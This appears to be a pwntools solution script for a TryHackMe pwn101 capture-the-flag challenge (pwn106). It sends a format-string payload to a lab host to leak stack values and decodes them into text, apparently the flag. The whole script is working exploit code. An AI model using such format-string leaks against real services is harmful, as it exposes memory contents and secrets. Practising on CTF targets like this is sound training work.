ctfs/thm_pwn101/pwn106/a.py

#!/usr/bin/python3

from pwn import *
from binascii import unhexlify

context.binary = target = ELF("./pwn106", checksec=False)
# r = process()
r = remote("10.10.74.244", 9006)

# funcs
s = lambda a: r.send(a)

# buf
s(b"%6$p.%7$p.%8$p.%9$p.%10$p.%11$p")
r.recvuntil(b"Thanks ")
out = b"".join([unhexlify(a[2:])[::-1] for a in r.recvS().split(".")]).decode()
print(out)

r.interactive()